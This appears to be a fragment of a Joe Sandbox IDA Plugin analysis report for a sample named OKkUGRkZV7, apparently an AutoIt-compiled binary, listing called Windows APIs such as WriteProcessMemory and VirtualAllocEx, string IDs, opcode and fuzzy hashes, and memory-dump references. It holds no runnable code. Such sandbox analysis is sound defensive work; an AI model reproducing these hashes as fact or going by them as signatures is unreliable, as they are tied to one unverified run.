                                              Similarity
                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                              • String ID: .lnk
                                              • API String ID: 2126378814-24824748
                                              • Opcode ID: 9163b4f61656c1485063c6d12f19631d9190645dce32eb0571cdb823ee5385e9
                                              • Instruction ID: 9af1facb08da29cf768984507df86c595c14a90b95b608d664bf2702bc5f09bf
                                              • Opcode Fuzzy Hash: 9163b4f61656c1485063c6d12f19631d9190645dce32eb0571cdb823ee5385e9
                                              • Instruction Fuzzy Hash: 69A155756043059FCB12DF14C484E6ABBE5FF8A314F058999F89A9B3A2CB31EC45CB91
                                              APIs
                                              • OleSetContainedObject.OLE32(?,00000001), ref: 0039B4BE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ContainedObject
                                              • String ID: AutoIt3GUI$Container$%=
                                              • API String ID: 3565006973-2852750407
                                              • Opcode ID: fb50cfe2df5df0379ca56385945136b0d56297f0f0859f06396093e1dea1447c
                                              • Instruction ID: 05fac280d76901f742fcdd069852ba4922257ae77cce5e8387d327a9c8828f88
                                              • Opcode Fuzzy Hash: fb50cfe2df5df0379ca56385945136b0d56297f0f0859f06396093e1dea1447c
                                              • Instruction Fuzzy Hash: 22915774200601EFDB15DF64D984B6ABBF9FF49710F20856EE94ACB6A1DB70E841CB60
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 003650AD
                                                • Part of subcall function 003700F0: __87except.LIBCMT ref: 0037012B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ErrorHandling__87except__start
                                              • String ID: pow
                                              • API String ID: 2905807303-2276729525
                                              • Opcode ID: fa8f18962ab935085d3684ce1af04d4bb42820d595d611c3cf18936c7fb128ec
                                              • Instruction ID: 048d60513161a8e4605663dbbf9dfd6de1102a2c2d55232b50cc7cbf7ecbf47f
                                              • Opcode Fuzzy Hash: fa8f18962ab935085d3684ce1af04d4bb42820d595d611c3cf18936c7fb128ec
                                              • Instruction Fuzzy Hash: D0517B6591C502D6DB2B7724CD4137E2B98AB41700F20CD79E4D98A2AEEF38CDC49A86
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID: 3c5$_5
                                              • API String ID: 4104443479-2150917133
                                              • Opcode ID: 135fc18bc5443ff0cff0ccced5be0ec7fcf5000b80389aacd4c676bdea870b42
                                              • Instruction ID: c993c63f916bdf8ce276a6c9d3a4a8f4a60fea1256d3a35886465fb5a20c3cad
                                              • Opcode Fuzzy Hash: 135fc18bc5443ff0cff0ccced5be0ec7fcf5000b80389aacd4c676bdea870b42
                                              • Instruction Fuzzy Hash: 9651AD709006099FCF26DF68C880AAEB7B5FF44304F608569E85AD7250EB30E995CB51
                                              APIs
                                                • Part of subcall function 003A14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00399296,?,?,00000034,00000800,?,00000034), ref: 003A14E6
                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0039983F
                                                • Part of subcall function 003A1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003992C5,?,?,00000800,?,00001073,00000000,?,?), ref: 003A14B1
                                                • Part of subcall function 003A13DE: GetWindowThreadProcessId.USER32(?,?), ref: 003A1409
                                                • Part of subcall function 003A13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0039925A,00000034,?,?,00001004,00000000,00000000), ref: 003A1419
                                                • Part of subcall function 003A13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0039925A,00000034,?,?,00001004,00000000,00000000), ref: 003A142F
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003998AC
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003998F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                              • String ID: @
                                              • API String ID: 4150878124-2766056989
                                              • Opcode ID: d2fc13337426619bca1710fe624c4994cda9a67c55795b32312223bc92803bc8
                                              • Instruction ID: e0727ad6d318a579a8a551650541454d21c1465e7c9e69be62dca2aec90632bb
                                              • Opcode Fuzzy Hash: d2fc13337426619bca1710fe624c4994cda9a67c55795b32312223bc92803bc8
                                              • Instruction Fuzzy Hash: A0412E76901218AFDF11DFA8CC86EDEBBB8EB09300F004199F955B7191DA716E45CBA1
                                              APIs
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003CF910,00000000,?,?,?,?), ref: 003C79DF
                                              • GetWindowLongW.USER32 ref: 003C79FC
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003C7A0C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$Long
                                              • String ID: SysTreeView32
                                              • API String ID: 847901565-1698111956
                                              • Opcode ID: ff1d3f441174bf29a5682464da6e56e44f57cc001294ba8e376789c9fc9e1fbd
                                              • Instruction ID: cf0e6f66c2f956dea0f157216fd145ebaac05c29e825af3bd25033b0c696cdf3
                                              • Opcode Fuzzy Hash: ff1d3f441174bf29a5682464da6e56e44f57cc001294ba8e376789c9fc9e1fbd
                                              • Instruction Fuzzy Hash: 8F319C35204606AFDB129E38CC45FEB7BA9EB05324F218729F875E62E0D731ED519B50
                                              APIs
                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003C7461
                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003C7475
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 003C7499
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: SysMonthCal32
                                              • API String ID: 2326795674-1439706946
                                              • Opcode ID: f9cdbd483152f0302c1bb9995c0680def87d59acc3b6a12a787fba1f1c72ad9d
                                              • Instruction ID: c268180a559df522a34bdddbe6362ee666e139ffd09c1d0bc62302cb931204e0
                                              • Opcode Fuzzy Hash: f9cdbd483152f0302c1bb9995c0680def87d59acc3b6a12a787fba1f1c72ad9d
                                              • Instruction Fuzzy Hash: E621A332500218AFDF168F65CC46FEA3B69EF48724F120118FE15AB1D0DA75AC51DBA0
                                              APIs
                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003C7C4A
                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003C7C58
                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003C7C5F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$DestroyWindow
                                              • String ID: msctls_updown32
                                              • API String ID: 4014797782-2298589950
                                              • Opcode ID: 8b69a0b5a40e288caccdc991db6d776098daf9baf8aaa76a4c6d2a85d2c1921a
                                              • Instruction ID: 88b2c70a0942ea5af5ee883c69d0b8a82c611e30943a9b27102308d46562daf2
                                              • Opcode Fuzzy Hash: 8b69a0b5a40e288caccdc991db6d776098daf9baf8aaa76a4c6d2a85d2c1921a
                                              • Instruction Fuzzy Hash: 04217CB5604209AFDB12EF24DCC1EA737EDEB4A3A4B154059FA05DB3A1CB31EC519B60
                                              APIs
                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003C6D3B
                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003C6D4B
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003C6D70
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend$MoveWindow
                                              • String ID: Listbox
                                              • API String ID: 3315199576-2633736733
                                              • Opcode ID: 37184922ca4cd72b19edfdea8914cf295dbafbca5e26999c65496452e423476c
                                              • Instruction ID: b170f06ddc95423c9754cf58ddb065428ec7f8f7ccec4c15f6b8c0f9deb630f8
                                              • Opcode Fuzzy Hash: 37184922ca4cd72b19edfdea8914cf295dbafbca5e26999c65496452e423476c
                                              • Instruction Fuzzy Hash: 48219232610118BFDF128F54CC46FBB3BBEEF89750F018128F9459B1A0C671AC519BA0
                                              APIs
                                              • __snwprintf.LIBCMT ref: 003B3A66
                                                • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: __snwprintf_memmove
                                              • String ID: , $$AUTOITCALLVARIABLE%d$%=
                                              • API String ID: 3506404897-2298458297
                                              • Opcode ID: d3b6229309fbd6e42805e45c6ea439f066d3c243edb25007543f27338701a778
                                              • Instruction ID: 9d040fcc65525f7425d5709b134bd8d7b7220fb925453641da65cf8cea58079f
                                              • Opcode Fuzzy Hash: d3b6229309fbd6e42805e45c6ea439f066d3c243edb25007543f27338701a778
                                              • Instruction Fuzzy Hash: 59214F31A00229ABCF16EF64CC82AEE77B9EF44704F504455E655AF182DB30EA45CB61
                                              APIs
                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003C7772
                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003C7787
                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003C7794
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: msctls_trackbar32
                                              • API String ID: 3850602802-1010561917
                                              • Opcode ID: adef56747f464737239280110e3d62ce84248c30c8476464621f5bacb737e5b3
                                              • Instruction ID: 7efc3e7214984171dc2fa05d9ea25d9bc9c0763c84f6fa826391d38b74de3f14
                                              • Opcode Fuzzy Hash: adef56747f464737239280110e3d62ce84248c30c8476464621f5bacb737e5b3
                                              • Instruction Fuzzy Hash: BA11C172244208BAEF255F65CC05FEB7BADEF89B64F12412CFA45A6090C672A851DB20
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: __calloc_crt
                                              • String ID: ?$@B@
                                              • API String ID: 3494438863-2252957899
                                              • Opcode ID: 32dcfc551e799f9ee017bd6a722f09935fd8b3af9be7db14f8e2a0cab58a5e58
                                              • Instruction ID: 64b80cf317036a94e565a33652848b9efe20a31a0aa81464d97b978648aa1e59
                                              • Opcode Fuzzy Hash: 32dcfc551e799f9ee017bd6a722f09935fd8b3af9be7db14f8e2a0cab58a5e58
                                              • Instruction Fuzzy Hash: 1AF0FC75204612CBFB269F16BD53B632795EB057B0F10807EE200DF198EB3088404EC8
                                              APIs
                                              • __lock.LIBCMT ref: 00369B94
                                                • Part of subcall function 00369C0B: __mtinitlocknum.LIBCMT ref: 00369C1D
                                                • Part of subcall function 00369C0B: EnterCriticalSection.KERNEL32(00000000,?,00369A7C,0000000D), ref: 00369C36
                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00369BA4
                                                • Part of subcall function 00369100: ___addlocaleref.LIBCMT ref: 0036911C
                                                • Part of subcall function 00369100: ___removelocaleref.LIBCMT ref: 00369127
                                                • Part of subcall function 00369100: ___freetlocinfo.LIBCMT ref: 0036913B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                              • String ID: 8?$8?
                                              • API String ID: 547918592-297661732
                                              • Opcode ID: 180f615ddfc6a34ac3d3791a404a0e2a59433e269b2f6f7a68ee062fd7433087
                                              • Instruction ID: 1e72c3896bad6232a75347ccc671decf004a29da13c23da6491dc7ef5803eecc
                                              • Opcode Fuzzy Hash: 180f615ddfc6a34ac3d3791a404a0e2a59433e269b2f6f7a68ee062fd7433087
                                              • Instruction Fuzzy Hash: 95E08671547304EDDB13BBA4690376826985B01721F21926BF1459A0D9CEB40800C517
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00344B83,?), ref: 00344C44
                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00344C56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-1355242751
                                              • Opcode ID: d6e5a52a7c2b38feba3214bacc8c4f9021145bc916e71412323b31a6471ac360
                                              • Instruction ID: c366d67e9c1ad5b4f48966bafa431a79e471356afeb7212800ff1455eab984e5
                                              • Opcode Fuzzy Hash: d6e5a52a7c2b38feba3214bacc8c4f9021145bc916e71412323b31a6471ac360
                                              • Instruction Fuzzy Hash: EAD0E230510722DFD7229B32D948A5AB6EAAF05351B1A883AD596DA160E670E8808B50
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00344BD0,?,00344DEF,?,004052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00344C11
                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00344C23
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                              • API String ID: 2574300362-3689287502
                                              • Opcode ID: 9202f615afad7dfb7f2c7c9f7dc95ae802f88eaf023d449b6d9ab43a951d72bd
                                              • Instruction ID: baf1ac128cbb0084d32918a0b95c088336dfc4086ba46cd5c2da2b17be4426ad
                                              • Opcode Fuzzy Hash: 9202f615afad7dfb7f2c7c9f7dc95ae802f88eaf023d449b6d9ab43a951d72bd
                                              • Instruction Fuzzy Hash: D8D0EC34911712DFD7226B71D948A46BADAAF09351B198839D486D6160E6B0E8808750
                                              APIs
                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,003C1039), ref: 003C0DF5
                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003C0E07
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                              • API String ID: 2574300362-4033151799
                                              • Opcode ID: 17c35c8ba652bbb0af646e260ad60b891578c352411e5e835e7f01e78ed131a9
                                              • Instruction ID: 40f495ecd5d21040abad901119ac65c64be28ca89447db23a6385dd672346867
                                              • Opcode Fuzzy Hash: 17c35c8ba652bbb0af646e260ad60b891578c352411e5e835e7f01e78ed131a9
                                              • Instruction Fuzzy Hash: 5CD0C730440B26CFC3268F70C808B82B2EAAF01342F068C3ED58AC6250E6B1E890CB00
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,003B8CF4,?,003CF910), ref: 003B90EE
                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003B9100
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetModuleHandleExW$kernel32.dll
                                              • API String ID: 2574300362-199464113
                                              • Opcode ID: 6799de1106aea00e9e19fe94fa8b16739dd3075cdf548d551b767e7e5d310747
                                              • Instruction ID: 9a092e3a97e4c8b0be1cba5716677261c30fb965694bb10ee90a7f34c5868038
                                              • Opcode Fuzzy Hash: 6799de1106aea00e9e19fe94fa8b16739dd3075cdf548d551b767e7e5d310747
                                              • Instruction Fuzzy Hash: 1ED01235510713CFD7229F35D818A8676D9AF05355F17C83ED686D6550E770D880C750
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: LocalTime__swprintf
                                              • String ID: %.3d$WIN_XPe
                                              • API String ID: 2070861257-2409531811
                                              • Opcode ID: d8141a40faa0de706e71d1a1e70f6ced8a90cb58832fc75a970d33ef97e21c02
                                              • Instruction ID: 56aa02e0484d2eef09490d1fbe076b753bb7f9fbc7a16a83824bba9f7eed09cf
                                              • Opcode Fuzzy Hash: d8141a40faa0de706e71d1a1e70f6ced8a90cb58832fc75a970d33ef97e21c02
                                              • Instruction Fuzzy Hash: 58D05B7280530DFAC703B790DC88DF9737CA708301F1408A6F506D2450E2359755E721
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
